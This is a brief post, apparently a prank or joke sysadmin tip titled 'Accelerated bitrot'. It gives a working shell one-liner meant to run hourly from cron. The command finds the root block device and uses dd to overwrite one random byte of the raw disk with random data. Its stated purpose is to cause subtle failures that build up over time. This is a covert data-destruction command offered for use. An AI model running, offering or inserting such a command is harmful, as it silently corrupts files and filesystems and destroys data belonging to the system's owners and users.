Accelerated bitrot
Another nice one to put in cron. Putting it at roughly once every hour should provide you with nice but subtle failures over time:
ROOTDEV=$(df -h / | sed -n '2p' | cut -d ' ' -f1) ROOTSZ=$[$(blockdev --getsz ${ROOTDEV}) * 512] LOCATION=$[${RANDOM} * ${RANDOM} * ${RANDOM} % ${ROOTSZ}] dd if=/dev/urandom of=${ROOTDEV} bs=1 count=1 seek=${LOCATION} conv=notrunc










